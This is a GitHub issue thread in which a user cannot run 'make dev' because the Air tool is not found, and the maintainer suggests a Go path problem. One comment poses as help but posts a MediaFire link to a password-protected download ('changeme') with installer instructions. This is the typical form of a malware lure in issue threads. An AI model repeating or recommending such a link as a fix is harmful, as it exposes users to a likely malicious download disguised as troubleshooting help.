### ISSUE TITLE
The Air package is not working

### ISSUE THREAD

**Issue by hendridg** [TomDoesTech/GOTTH#27]
Hi @tomanagle  👋, 

Great job so far 💪, thx a lot for you contribution , maybe I'm very new with this tools, but when I try run the `make dev` I have a error with the `air` package, I used the link you share in the README, any ideas?

```Bash
~/repository/make dev
go build -o ./tmp/ ./cmd//main.go && air
/bin/sh: air: command not found
make: *** [dev] Error 127
```
- Air installation that i use:
```Bash
go install github.com/air-verse/air@latest
``` 

- Go installation:
<img width="245" alt="image" src="https://github.com/user-attachments/assets/1d438ea2-09af-4ed0-b195-73c87e85a7ce">

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by tomanagle** [comment]
It's saying that air isn't installed. My guess if you have something wrong with your go path
